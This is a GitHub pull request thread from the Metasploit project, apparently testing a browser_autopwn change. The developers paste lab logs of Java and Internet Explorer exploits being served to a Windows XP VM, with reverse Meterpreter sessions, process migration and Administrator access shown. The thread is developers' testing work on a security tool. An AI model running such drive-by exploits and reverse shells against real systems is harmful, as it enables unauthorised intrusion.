[-] [2013.11.18-12:33:02] 192.168.172.134 java_atomicreferencearray - Exception handling request: Connection reset by peer
[*] [2013.11.18-12:33:02] 192.168.172.134 java_rhino - Java Applet Rhino Script Engine Remote Code Execution handling request
[-] [2013.11.18-12:33:02] 192.168.172.134 java_atomicreferencearray - Exception handling request: Connection reset by peer
[*] [2013.11.18-12:33:02] 192.168.172.134 java_jre17_jmxbean - handling request for /eGvrqYZiirFI/CSEOouCc.jar
[*] [2013.11.18-12:33:03] 192.168.172.134 java_atomicreferencearray - Sending jar
[*] [2013.11.18-12:33:03] 192.168.172.134 java_jre17_jmxbean - handling request for /eGvrqYZiirFI
[*] [2013.11.18-12:33:03] 192.168.172.134 java_jre17_jmxbean - handling request for /eGvrqYZiirFI/CSEOouCc.jar
[*] [2013.11.18-12:33:03] 192.168.172.134 java_jre17_reflection_types - handling request for /XWXvi
[*] [2013.11.18-12:33:03] 192.168.172.134 java_jre17_provider_skeleton - handling request for /dCnMRYXr
[*] [2013.11.18-12:33:03] 192.168.172.134 ie_cgenericelement_uaf - Requesting: /cBifUVNmO
[*] [2013.11.18-12:33:03] 192.168.172.134 ie_cgenericelement_uaf - Target selected as: IE 8 on Windows XP SP3
[*] [2013.11.18-12:33:03] 192.168.172.134 ie_cgenericelement_uaf - Sending HTML...
[*] [2013.11.18-12:33:03] 192.168.172.134 ie_execcommand_uaf - Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E)
[*] [2013.11.18-12:33:03] 192.168.172.134 ie_execcommand_uaf - Redirecting to BJNbX.html
[*] [2013.11.18-12:33:03] 192.168.172.134 java_atomicreferencearray - Sending jar
[-] Failed to load client script file: /home/juan/metasploit-framework/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi.rb
[*] [2013.11.18-12:33:03] 192.168.172.134 java_atomicreferencearray - Sending Java AtomicReferenceArray Type Violation Vulnerability
[*] [2013.11.18-12:33:03] 192.168.172.134 java_atomicreferencearray - Generated jar to drop (5489 bytes).
[*] [2013.11.18-12:33:03] 192.168.172.134 java_jre17_jmxbean - handling request for /eGvrqYZiirFI/
[*] [2013.11.18-12:33:03] 192.168.172.134 java_jre17_reflection_types - handling request for /XWXvi/
[*] [2013.11.18-12:33:03] 192.168.172.134 java_verifier_field_access - Sending Java Applet Field Bytecode Verifier Cache Remote Code Execution
[*] [2013.11.18-12:33:03] 192.168.172.134 java_verifier_field_access - Generated jar to drop (5489 bytes).
[*] [2013.11.18-12:33:03] Sending stage (769024 bytes) to 192.168.172.134
[*] [2013.11.18-12:33:03] 192.168.172.134 ie_execcommand_uaf - Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E)
[*] [2013.11.18-12:33:03] 192.168.172.134 ie_execcommand_uaf - Loading BJNbX.html
[*] [2013.11.18-12:33:03] 192.168.172.134 ie_execcommand_uaf - Using msvcrt ROP
[*] [2013.11.18-12:33:04] 192.168.172.134 java_jre17_provider_skeleton - handling request for /dCnMRYXr/
[*] [2013.11.18-12:33:04] 192.168.172.134 java_rhino - Java Applet Rhino Script Engine Remote Code Execution handling request
[*] [2013.11.18-12:33:04] Session ID 1 (192.168.172.133:7777 -> 192.168.172.134:1056) processing InitialAutoRunScript 'migrate -f'
[*] [2013.11.18-12:33:06] Session ID 2 (192.168.172.133:7777 -> 192.168.172.134:1062) processing InitialAutoRunScript 'migrate -f'
[*] [2013.11.18-12:33:11] Session ID 3 (192.168.172.133:3333 -> 192.168.172.134:1068) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (1344)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 2760
[+] Successfully migrated to process 

@jvazquez-r7
Copy link
Contributor Author

The error while running pro which mainly concerns me is:

[-] Failed to load client script file: /home/juan/metasploit-framework/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi.rb

Would worth wich @dmaloney-r7 confirms there is nothing wrong :)

In order to proceed I replaced the msf3 dir into pro for a symlink to a metasploit-framework dir with a checkout to this brnach:

root@ubuntu:/opt/metasploit/apps/pro# ls -la msf3
lrwxrwxrwx 1 root root 32 2013-11-18 12:16 msf3 -> /home/juan/metasploit-framework/

@jvazquez-r7
Copy link
Contributor Author

As requested by @wchen-r7 :

Running #0 Java Applet Field Bytecode Verifier Cache Remote Code Execution from pro (msf3 linked to metasploit-framework git checkout to this branch)

Test successful, task output as requested by @wchen-r7 :

[+] [2013.11.19-09:58:59] Workspace:default Progress:1/2 (50%) Running Java Applet Field Bytecode Verifier Cache Remote Code Execution
[*] [2013.11.19-09:59:00] Started reverse handler on 0.0.0.0:1024
[*] [2013.11.19-09:59:00] Using URL: http://192.168.172.133:8080/7GosyftRNX
[*] [2013.11.19-09:59:00] Server started.
[*] [2013.11.19-10:00:04] 192.168.172.134 java_verifier_field_access - Sending Java Applet Field Bytecode Verifier Cache Remote Code Execution
[*] [2013.11.19-10:00:04] 192.168.172.134 java_verifier_field_access - Generated jar to drop (5489 bytes).
[*] [2013.11.19-10:00:06] 192.168.172.134 java_verifier_field_access - Sending jar
[*] [2013.11.19-10:00:06] 192.168.172.134 java_verifier_field_access - Sending jar
[*] [2013.11.19-10:00:07] Sending stage (30355 bytes) to 192.168.172.134
  • sessions screen (just text paste):
Session 1   Winlogo     192.168.172.134 - juan-c0de875735   Meterpreter     2 minutes   Administrator @ juan-c0de875735     JAVA_VERIFIER_FIELD_ACCESS`
  • session is okey and can be used:
Metasploit - Mdm::Session ID # 1 (192.168.172.134) Administrator @ juan-c0de875735
Meterpreter >

getuid


Server username: Administrator

sysinfo


Computer    : juan-c0de875735
OS          : Windows XP 5.1 (x86)
Meterpreter : java/java

@jvazquez-r7
Copy link
Contributor Author

According to @dmaloney-r7 it shouldn't be a blocker for this pull request:

 <thelightcosine>it looks like an issue with command dispatcher not doing a compeltely  reliable check on  whether the class was already laoded
<thelightcosine> so it's trying to load stdapi but that class has already been loaded

Indeed, verified with @wchen-r7 which the error only arises when two sessions are spawned from the same module from browser_autopwn.

wchen-r7 added a commit that referenced this pull request Nov 19, 2013
@wchen-r7 wchen-r7 merged commit fe2cd93 into rapid7:master Nov 19, 2013
@jvazquez-r7 jvazquez-r7 deleted the browser_autopwn_reload branch November 18, 2014 15:44
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

Successfully merging this pull request may close these issues.

None yet

7 participants